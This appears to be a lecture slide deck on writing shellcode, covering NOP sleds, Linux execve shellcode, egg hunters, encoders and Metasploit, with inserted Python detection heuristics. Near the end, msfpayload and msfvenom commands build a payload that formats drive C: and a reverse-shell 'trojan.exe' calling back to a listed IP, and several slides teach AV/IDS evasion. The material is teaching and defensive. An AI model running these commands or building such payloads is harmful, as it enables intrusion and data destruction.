Shell Coding

shell coding techniques

Uploaded by astir1234
Shellcode

- Shellcode
  - A set of instructions injected and executed by exploited software
  - Also called a payload
  - Denoted as shellcode because shellcode most typically spawns a command shell

NOP Sled

- NOP Sled
  - Set of instructions which ultimately do not affect code execution
  - Placed before shellcode so that a transfer of execution into the NOP sled will transfer execution into the shellcode
  - NOP instruction (\x90)
  - Good NOP sleds
    - Do not interfere with code execution
    - May be entered at any location
    - Are hard to detect

NOP Sled Technology

- IDS Evasion
  - Easy to detect a large 0x90 NOP sled
  - ADMutate
    - Single-byte x86
  - Opty2
    - Part of Metasploit
    - Multi-byte slide

NOP Sled Technology

- Multi-byte NOP Sleds

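As an added detection-side example (not from the slides), the following Python heuristic flags long runs of single-byte x86 instructions that do not change control flow, the raw material of both plain 0x90 sleds and ADMutate-style single-byte sleds; multi-byte sleds such as Opty2 need a real instruction decoder, which this does not attempt. The opcode table and the sample buffer are constructed for the example.

```python
# Added detection heuristic (not from the slides): flag long runs of single-byte
# x86 instructions that do not alter control flow, the building blocks of plain
# 0x90 sleds and of ADMutate-style single-byte sleds.  Multi-byte sleds such as
# Opty2 need a real instruction decoder and are not caught by this.

# Opcode -> mnemonic for single-byte instructions commonly used as sled filler
# (constructed table, deliberately small).
SLED_OPCODES = {0x90: "nop", 0x98: "cwde", 0x99: "cdq", 0xF5: "cmc",
                0xF8: "clc", 0xF9: "stc", 0xFC: "cld", 0xFD: "std"}
SLED_OPCODES.update({b: "inc r32" for b in range(0x40, 0x48)})
SLED_OPCODES.update({b: "dec r32" for b in range(0x48, 0x50)})
SLED_OPCODES.update({b: "xchg eax,r32" for b in range(0x91, 0x98)})


def find_sleds(data: bytes, min_len: int = 16):
    """Return (offset, length, distinct_opcodes) for every run of at least
    min_len consecutive sled-candidate bytes.  A run with one distinct opcode
    is a classic 0x90 sled; many distinct opcodes suggests a mutated sled."""
    runs, start = [], None
    for i, b in enumerate(data + b"\x00"):   # sentinel closes a trailing run
        if b in SLED_OPCODES:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                runs.append((start, i - start, len(set(data[start:i]))))
            start = None
    return runs


# Constructed sample buffer: 40 plain NOPs, three non-sled bytes, a 24-byte
# mixed single-byte sled, then the int 0x80 bytes from the syscall slide.
SAMPLE = (b"\x90" * 40 + b"\x31\xc0\x50"
          + bytes([0x41, 0x4A, 0x90, 0x97, 0xFC, 0x42, 0x99, 0x48]) * 3
          + b"\xcd\x80")

if __name__ == "__main__":
    for off, length, distinct in find_sleds(SAMPLE):
        print(f"sled at offset {off}: {length} bytes, {distinct} distinct opcodes")
```

Tune min_len to the traffic you inspect: short runs of inc/dec/xchg also occur in legitimate code, so the distinct-opcode count is the more useful second signal.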
Linux System Calls

- System Calls
  - Aka syscall
  - Powerful set of kernel functions
- Linux System Call
  1. The syscall number is loaded into EAX
  2. Arguments are placed in other registers
     - EBX, ECX, EDX, ESI, EDI, EBP
  3. Int 0x80 (\xCD \x80)
  4. CPU switches to kernel mode
  5. Syscall executes

Exit Shellcode

- Exit.c
  - We will compile statically
    - This will include the exit function in our executable
    - gcc -static -o exit exit.c

Exit Shellcode

Exit Shellcode

- Two Syscalls
  - Exit Group (0xFC)
    - Argument 1: [esp+4] = 0
  - Exit (0x01)
    - Argument 1: [esp+4] = 0

Exit Shellcode

- Exit.asm
  - NASM (Netwide Assembler)
  - We do not need the exit group for our shellcode

Exit Shellcode

- Exit.asm
  - Assemble with NASM
  - Link/Load with ld
  - Execute
  - Dump with objdump

Exit Shellcode

- Shellcode Test
  - Standard C template to test shellcode

Injectable Shellcode

- Common Constraints on Shellcode
  - No null bytes
  - ASCII text only
    - Uppercase/lowercase
  - Unicode only
    - Uppercase/lowercase

Injectable Shellcode

- No Null Bytes
  - Literals are a large source of nulls
  - Xor trick
  - Truncation trick

Injectable Shellcode

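To make the constraints concrete, here is an added Python check (not part of the slides) that reports which bytes of a code sequence violate the null-free, printable-ASCII or alphanumeric constraint. It is run on two hand-assembled encodings of the exit(0) syscall from the earlier slides: one written with 32-bit immediates, and one rewritten with the xor trick and the truncation trick. The opcode bytes are standard x86 encodings; the inputs are constructed for the example.

```python
import string

# Added example (not from the slides): report which bytes of a code sequence
# break one of the injection constraints listed above.
ALPHANUM = set(string.ascii_letters.encode() + string.digits.encode())
PRINTABLE = set(range(0x20, 0x7F))
CHECKS = {
    "no-null": lambda b: b == 0,           # byte would terminate a C string
    "ascii":   lambda b: b not in PRINTABLE,
    "alnum":   lambda b: b not in ALPHANUM,
}


def violations(code: bytes, constraint: str):
    """Return [(offset, byte)] for every byte that violates the constraint."""
    bad = CHECKS[constraint]
    return [(i, b) for i, b in enumerate(code) if bad(b)]


def report(code: bytes):
    """Map each constraint name to the number of offending bytes."""
    return {name: len(violations(code, name)) for name in CHECKS}


# Constructed inputs: exit(0) via int 0x80, first written with 32-bit
# immediates (mov ebx, 0 / mov eax, 1 / int 0x80) ...
NAIVE_EXIT = bytes.fromhex("bb00000000" "b801000000" "cd80")
# ... then with the xor trick (xor ebx,ebx / xor eax,eax) and the truncation
# trick (mov al, 1) so that no literal zero bytes are emitted.
NULLFREE_EXIT = bytes.fromhex("31db" "31c0" "b001" "cd80")

if __name__ == "__main__":
    for name, code in (("naive", NAIVE_EXIT), ("null-free", NULLFREE_EXIT)):
        print(name, code.hex(), report(code))
```

The second run shows that a null-free sequence is still far from printable, which is the gap an alphanumeric encoder from the later slides has to close.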
Popping a Shell in Linux

- Local Shell Shellcode
  - execve
    int execve(const char *filename, char *const argv[], char *const envp[])

Popping a Shell in Linux

- Local Shell Shellcode

Popping a Shell in Linux

Popping a Shell in Linux

Popping a Shell in Linux

- Jump / Call
  - Position Independent Code (PIC) technique
  - A call gives us access to relative addressing

Popping a Shell in Linux

- Notes
  - db in code section
    - Essentially scratch space
  - Avoid nulls
    - Xor
    - Truncation
    - Dynamic overwrite
  - PIC
    - Using ESI
- Annotations on the listing
  - Pop Ret into ESI
  - Clear EAX
  - Set J to null byte
  - Arg1 = &/bin/sh
  - Set AAAA to &Arg1
  - Set KKKK to NULL
  - Syscall 0x0b (execve)
  - Arg1 = &/bin/sh
  - Arg2 = &&/bin/sh
  - Arg3 = &NULL
  - Syscall Interrupt

Popping a Shell in Linux

- Shellcode Test
  - Standard C template to test shellcode

Windows Shellcoding

- Windows Shellcode
  - System calls exist (int 0x2e)
    - But most functionality is found elsewhere
  - Windows uses DLLs for most system functions
    - These addresses change per OS and service pack
  - Code normally resolves addresses dynamically
    - This makes Windows shellcode large
    - Means we have to process the PEB in our shellcode
- Popping a Shell in Windows
  - Never do this!

Position Independent Code Revisited

- Noir's Get EIP
  - fldz
    - Dummy FPU instruction
  - fnstenv
    - Gets the EIP of the last FPU instruction
  - pop
    - Pops the value into EAX

  D9EE      fldz
  D97424F4  fnstenv [esp-0xc]
  58        pop eax

Position Independent Code Revisited

- Call $+4
  - Relative jump into the call instruction itself
  - Opcodes are decoded on the fly

  As assembled (linear decoding):

  E8FFFFFFFF  call 0x4
  C3          ret
  58          pop eax

  As executed (the call lands on its own last byte):

  FFC3        inc ebx
  58          pop eax

Types of Payloads

- Single
  - Self-contained payload
- Stager
  - A payload that loads then executes a stage
    - Over a network connection
    - Allows use of large payloads
    - Kernel to user (ring 0 to ring 3) handoff
    - Metasploit's stager_sysenter_hook
  - Usually smaller than single payloads
- Stage
  - A payload that is loaded via a stager

Types of Shellcode

- Local
- Remote
- Download and Execute
- Staged
- Egg-hunter
- Omelet

Local Versus Remote Shellcode

- Local Shellcode
  - Privilege escalation
- Remote Shellcode
  - Reverse
    - Connect from victim back to hacker
    - Bypasses firewalls and NAT
  - Bind
    - Open a server port on the victim for the hacker
  - Find
    - Reuse an existing connection

Download and Execute / Staged Shellcode

- Download and Execute Shellcode
  - Commonly used for browser drive-by attacks
  - Shellcode downloads a file from a network
    - Saves it to the disk, then executes it
- Staged Shellcode
  - Stager shellcode downloads stage shellcode
    - Stager usually called stage 1
    - Stage usually called stage 2

Egg Hunter / Omelet Shellcode

- Egg Hunter
  - Small hunter shellcode is injected at a predictable location
  - Searches for a larger egg at a less predictable location
- Omelet
  - Recombines multiple small eggs into one payload called the omelet
  - Useful if you can only inject small blocks

Egg Hunter / Omelet Shellcode

- Survivable Search Techniques
  - NtAccessCheckAndAuditAlarm
    - Offset 0x2 in KiServiceTable

  ; push address to check
  push edx
  ; NtAccessCheckAndAuditAlarm
  mov eax, 0x02
  ; syscall
  int 0x2e
  ; did we get an ACCESS_VIOLATION (0xc0000005)?
  cmp eax, 0xc0000005

Metasploit Egg Hunter

- Egg Hunter Stub
  - Egg tag
    - The marker repeated twice
  - Marker
    - Random 4-byte identifying value
  - Checksum stub
    - Computes the payload checksum in case we got a false positive on the marker

Metasploit Egg Hunter

  check_readable:
      ; jump at most 0xfff ahead
      or dx, 0xfff
  next_addr:
      inc edx                 ; edx is for searching
      push edx                ; preserve edx
      ; NtAccessCheckAndAuditAlarm
      push 0x02
      pop eax                 ; eax = 0x02
      int 0x2e                ; syscall
      ; did we get ACCESS_VIOLATION
      ; (0xc0000005)?
      cmp al, 5
      pop edx                 ; restore edx
      je check_readable

  check_for_tag:
      ; check that the tag matches
      ; once
      mov eax, #{marker}
      mov edi, edx
      scasd                   ; compare [es:edi] to eax
      jne next_addr           ; not our marker
      ; it must match a second time
      ; since now edi = edx+4
      scasd                   ; compare [es:edi] to eax
      jne next_addr
      ; optionally insert a checksum
      ; stub here
      #{checksum}
      ; jump to the payload
      jmp edi

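As an added detection-side example (not from the slides or from Metasploit), this Python scanner looks for the traces the listing above leaves in a captured buffer: the readability probe (or dx, 0xfff followed shortly by int 0x2e), the mov eax, imm32 that loads the marker, and that marker doubled elsewhere in the same buffer (the egg tag). The regexes, distance limits and the sample buffer are constructed for the example; this is a signature heuristic, not a disassembler.

```python
import re

# Added detection heuristic (not from the slides or Metasploit): find the traces
# an egg hunter of the kind listed above leaves in a captured buffer.
# Readability probe: "or dx, 0xfff" (66 81 CA FF 0F) followed within a few
# bytes by "int 0x2e" (CD 2E).
PROBE_RE = re.compile(rb"\x66\x81\xca\xff\x0f.{0,12}?\xcd\x2e", re.DOTALL)
# "mov eax, imm32" (B8 xx xx xx xx) loads the 4-byte marker being hunted.
MOV_EAX_RE = re.compile(rb"\xb8(.{4})", re.DOTALL)


def find_egghunter(buf: bytes):
    """For every probe hit, return the marker loaded right after it (or None)
    and the offsets where that marker appears doubled, i.e. the egg tag."""
    findings = []
    for probe in PROBE_RE.finditer(buf):
        mov = MOV_EAX_RE.search(buf, probe.end())
        if mov is None or mov.start() - probe.end() > 16:
            findings.append({"probe": probe.start(), "marker": None, "eggs": []})
            continue
        marker = mov.group(1)
        eggs = [m.start() for m in re.finditer(re.escape(marker * 2), buf)]
        findings.append({"probe": probe.start(), "marker": marker, "eggs": eggs})
    return findings


# Constructed sample: filler, the probe fragment of the hunter, mov eax,"w00t",
# more filler, then the egg tag ("w00t" twice) in front of a dummy payload.
SAMPLE = (b"A" * 8
          + b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
          + b"\xb8w00t"
          + b"B" * 32
          + b"w00tw00t" + b"\xcc" * 16)

if __name__ == "__main__":
    for f in find_egghunter(SAMPLE):
        print(f"hunter probe at {f['probe']}, marker {f['marker']!r}, "
              f"egg tags at {f['eggs']}")
```

Because the checksum stub is optional, the scanner cannot validate the egg itself; a doubled marker with no nearby probe, or a probe with no egg, is a weaker signal than both together.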
Shellcode Encoder

- Encoder
  - Algorithm to transform shellcode
  - Creates equivalent shellcode with a different byte sequence that has special properties
    - Filter evasion
    - Character set restriction
    - AV / IDS evasion
    - Instruction patterns
    - Static string detection (like /bin/sh)
    - Size reduction
  - Complex encoders often leave decoders in the shellcode (called a decoder stub)

Shellcode Encoder: IDS Evasion

- Polymorphism
  - Code unravels itself as it executes
  - Typically implemented with a decoder stub
- Metamorphism
  - Code changes to equivalent code
    - Avoids pattern detection
  - Randomness is used in the code generation

Encoders

- Xor
- Jump/Call Xor Additive Feedback
- Alpha/Unicode
- Shikata Ga Nai
- Others

Shikata Ga Nai Encoder

- Shikata Ga Nai
  - Xor additive feedback encoder
  - Japanese for "nothing can be done about it"
    - Detection is too computationally expensive
    - Especially for network devices
  - Excellent encoder
    - Default Metasploit encoder

ASCII Art Encoder

Metasploit Shellcode Generator

- msfpayload
  - Metasploit shellcode generator
    - Web
    - Console
    - Command-line

Metasploit Shellcode Generator

Metasploit Shellcode Generator

- msfencode
  - Metasploit machine code encoder

Metasploit Shellcode Generator

Metasploit Shellcode Generator

Metasploit Shellcode Generator

- Using msfpayload and msfencode Together
  - Generating custom shellcode (C arrays)

    ./msfpayload windows/exec \
        cmd="format C: /y" \
        exitfunc=process R |
    ./msfencode -b '\x00' -t c

  - Generating a hostile executable

    ./msfpayload windows/meterpreter/reverse_tcp \
        lhost=192.168.1.50 \
        lport=12345 \
        exitfunc=process R |
    ./msfencode -t exe -o trojan.exe

Metasploit Shellcode Generator

- Using msfpayload and msfencode Together
  - msfvenom combines msfpayload and msfencode
  - Generating a hostile executable

    ./msfvenom windows/meterpreter/reverse_tcp \
        lhost=192.168.1.50 \
        lport=12345 \
        -t exe > trojan.exe

Metasploit Shellcode Generator

- AV Evasion

Generating Rick Roll Shellcode

Shellcode Resources

- Metasploit
- Shell-Storm.org

Questions/Comments?
